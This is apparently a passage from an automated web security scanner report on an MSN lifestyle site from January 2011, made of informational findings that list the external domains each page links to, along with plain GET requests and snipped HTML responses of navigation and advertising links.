<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406205&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-life%2Fyour-money-today%2Farticle.aspx%3Fcp-documentid%3D27387034%26gt1%3D32078&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<area href="http://lifestyle.redacted/your-life/your-money-today/" alt="Your Money Today" shape="rect" coords="0,0,647,79" /><area href="http://money.todayshow.com" alt="Your Money on Today Show" shape="rect" coords="888,53,964,81" /><area href="http://money.msn.com/saving-money/video.aspx" alt="Your Money on MSN Money" shape="rect" coords="811,51,872,81" /><area href="http://www.bankofamerica.com/solutions" alt="Bank of America" shape="rect" coords="822,8,964,53" /></map>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d853029/10/859690/randm.js"></script>
...[SNIP]...
<p class="partnerlogo cf"><a href="http://www.parenting.com/"><img src="http://blstb.redacted/i/71/CEF1BAE2CE10402EF4C51A46D486.jpg" width="150" height="29" alt="parenting.com" />
...[SNIP]...
<li><a href="http://www.parenting.com/gallery/25-iphone-apps-for-kids?cid=msn">The Best iPhone Apps For Kids and Parents</a>
...[SNIP]...
<li><a href="http://www.parenting.com/gallery/Mom/Ridiculous-Parenting-Products?cid=msn">Totally Ridiculous Parenting Products</a>
...[SNIP]...
<li><a href="http://www.parenting.com/gallery/Baby/Top-Girl-Baby-Names?cid=msn">Top 10 Baby Names of 2010</a>
...[SNIP]...
<li><a href="http://www.parenting.com/article/Toddler/Behavior/8-Discipline-Mistakes-Parents-Make?cid=msn">8 Discipline Mistakes Parents Make</a>
...[SNIP]...
<li><a href="http://parentingearlyyears.bonniersubscriptions.com/HBX0-SITEWIDE-PEY/">For more great mom-tested tricks, get a free trial issue of Parenting now!</a>
...[SNIP]...
<p><a href="http://www.facebook.com/MSNLife"><img src="http://blstb.redacted/i/8B/1FC16DD76C3B9D615FC9D59FC47E.gif" width="170" height="55" alt="Like MSN Lifestyle on Facebook" class="img0" />
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.redacted/your-life/your-money-today/article.aspx?cp-documentid=27387034&OCID=TWT">Tweet</a>
...[SNIP]...
e','1');" href="http://lifestyle.redacted/your-life/your-money-today/article.aspx?cp-documentid=27387034&page=0&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
);" href="http://lifestyle.redacted/your-life/your-money-today/article.aspx?cp-documentid=27387034&page=0&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<div class="child c1 first"><iframe src="http://www.coveritlive.com/index2.php/option=com_altcaster/task=viewaltcast/altcast_code=207bf850f8/height=385/width=300" scrolling="no" height="385px" width="300px" frameBorder="0" allowTransparency="true"><a href="http://www.coveritlive.com/mobile.php/option=com_mobile/task=viewaltcast/altcast_code=5895e5f0d6">TODAY Money Live Chat</a>
...[SNIP]...
<li><a href="http://www.bundle.com/MyMoney">Bundle.com: Uncomplicate your money</a>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js"></script>
...[SNIP]...

22.112. http://lifestyle.redacted/your-life/your-money-today/video.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-life/your-money-today/video.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://lifestyle.redacted/your-life/your-money-today/video.aspx?vid=44eb5873-9b59-48a2-9bc9-e3a313f766a5

The response contains the following links to other domains:

http://amch.questionmarket.com/adsc/d853029/10/859690/randm.js
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://money.todayshow.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.delish.com/?ocid=lifestylehp
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportallifestyle.112.2o7.net/b/ss/msnportallifestyle/1/H.1--NS/0
http://www.bankofamerica.com/solutions
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=ALS
http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24
http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24
http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24
http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/travel?cid=msn_lifestyle_nav
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406203&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-life%2Fyour-money-today%2Fvideo.aspx%3Fvid%3D44eb5873-9b59-48a2-9bc9-e3a313f766a5&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm

Request

GET /your-life/your-money-today/video.aspx?vid=44eb5873-9b59-48a2-9bc9-e3a313f766a5 HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.113. http://lifestyle.redacted/your-life/your-money-today/video.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-life/your-money-today/video.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://lifestyle.redacted/your-life/your-money-today/video.aspx?vid=44eb5873-9b59-48a2-9bc9-e3a313f766a5

The response contains the following links to other domains:

http://amch.questionmarket.com/adsc/d853029/10/859690/randm.js
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://money.todayshow.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.delish.com/?ocid=lifestylehp
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportallifestyle.112.2o7.net/b/ss/msnportallifestyle/1/H.1--NS/0
http://www.bankofamerica.com/solutions
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=ALS
http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24
http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24
http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24
http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/travel?cid=msn_lifestyle_nav
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344843&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-life%2Fyour-money-today%2Fvideo.aspx%3Fvid%3D44eb5873-9b59-48a2-9bc9-e3a313f766a5&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:23 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA12
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=98fd2f2679eb410cadba47beab66db1c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=59FC652155A647038C6AAF12082C6FBF; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:23 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 18327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344843&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-life%2Fyour-money-today%2Fvideo.aspx%3Fvid%3D44eb5873-9b59-48a2-9bc9-e3a313f766a5&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<area href="http://lifestyle.redacted/your-life/your-money-today/" alt="Your Money Today" shape="rect" coords="0,0,647,79" /><area href="http://money.todayshow.com" alt="Your Money on Today Show" shape="rect" coords="888,53,964,81" /><area href="http://money.msn.com/saving-money/video.aspx" alt="Your Money on MSN Money" shape="rect" coords="811,51,872,81" /><area href="http://www.bankofamerica.com/solutions" alt="Bank of America" shape="rect" coords="822,8,964,53" /></map>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d853029/10/859690/randm.js"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...

22.114. http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-look/makeup-skin-care-hair/staticslideshowessence.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx?cp-documentid=27338469&gt1=32002

The response contains the following links to other domains:

http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://download.live.com/?sku=messenger
http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc
http://insidemsn.wordpress.com/
http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.delish.com/?ocid=lifestylehp
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportallifestyle.112.2o7.net/b/ss/msnportallifestyle/1/H.1--NS/0
http://twitter.com/MSN_Style
http://twitter.com/share
http://us.social.s-msn.com/s/images/bluemannxl.png
http://www.bing.com/?FORM=MSNS52
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=ALS
http://www.bing.com/search?form=ALS&q=
http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=ask+ying+site%3Alifestyle.redacted&form=MSN037
http://www.bing.com/search?q=baby+names+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24
http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24
http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=motherhood+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=nail+colors+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24
http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24
http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=small+spaces+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+coats+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+decor+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/travel?cid=msn_lifestyle_nav
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.essence.com/
http://www.essence.com/entertainment/allaccess/hairstyle_file_regina_king.php
http://www.essence.com/hair/hot_hair/hot_hair_hot_street_styles.php
http://www.essence.com/hair/hot_hair/hot_hair_short_naturals_1.php
http://www.essence.com/hair/hot_hair/hot_hair_strand_stars_to_watch_in_2011.php
http://www.essence.com/hair/hot_hair/hot_hair_tress_makeovers_essence_hair_issue_2010.php
http://www.facebook.com/MSNLife
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344835&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-look%2Fmakeup-skin-care-hair%2Fstaticslideshowessence.aspx%3Fcp-documentid%3D27338469%26gt1%3D32002&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm

Request

GET /your-look/makeup-skin-care-hair/staticslideshowessence.aspx?cp-documentid=27338469&gt1=32002 HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:15 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA08
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=3b88921e94e84a28bbb9253898b0014a; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=169E21AC33FB464992E7E059FD4C0204; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:15 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 64422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344835&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-look%2Fmakeup-skin-care-hair%2Fstaticslideshowessence.aspx%3Fcp-documentid%3D27338469%26gt1%3D32002&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<div class="logo"><a href="http://www.essence.com"><img src="http://blstb.redacted/i/35/45EB806D89D4A1E3972FCC381B0.gif" width="90" height="30" alt="Essence" />
...[SNIP]...
<li class="first"><a href="http://www.essence.com/hair/hot_hair/hot_hair_hot_street_styles.php">Hot Hair: The Fiercest Street Styles</a>
...[SNIP]...
<li class=""><a href="http://www.essence.com/hair/hot_hair/hot_hair_tress_makeovers_essence_hair_issue_2010.php">Hot Hair: Tress Makeovers</a>
...[SNIP]...
<li class=""><a href="http://www.essence.com/entertainment/allaccess/hairstyle_file_regina_king.php">Hairstyle File: Regina King Through the Years </a>
...[SNIP]...
<li class=""><a href="http://www.essence.com/hair/hot_hair/hot_hair_strand_stars_to_watch_in_2011.php">Hot Hair: Strand Stars to watch in 2011 </a>
...[SNIP]...
<li class="last"><a href="http://www.essence.com/hair/hot_hair/hot_hair_short_naturals_1.php">Hot Hair: the Short Natural</a>
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx?cp-documentid=27338469&imageindex=1&OCID=TWT">Tweet</a>
...[SNIP]...
<td><a target="_blank" class="logo" href="http://www.bing.com/?FORM=MSNS52"><span>
...[SNIP]...
lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx?cp-documentid=27338469&gt1=32002&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
yle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx?cp-documentid=27338469&gt1=32002&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XVDVx7mtTIJY9353gvvnR1AlnHgv0TjbX?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X9OgAVb4XSzgOnR5-4feMtIJn-g5aby-Y?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XIai-q8n3t16U10iZQ0KzZoXSF7-6p2r9?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X1Fe3EMZPD2iv9gXlghF7p9YA4n9VlbgW?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucRptLnk" href="http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<div id="seemore" class="cf" ><a href="http://www.bing.com/search?form=ALS&q=">See more results</a>
...[SNIP]...
<map id="imap" name="imap"><area href="http://www.facebook.com/MSNLife" alt="MSN Lifestyle" shape="rect" coords="245,1,277,25" /><area href="http://twitter.com/MSN_Style" alt="MSN Twitter" shape="rect" coords="279,3,300,25" /></map>
...[SNIP]...
<span class="custom3"><a href="http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037">Valentine's Day</a></span><a href="http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.redacted&go=&form=MSN037">Winter Fashions</a><a href="http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
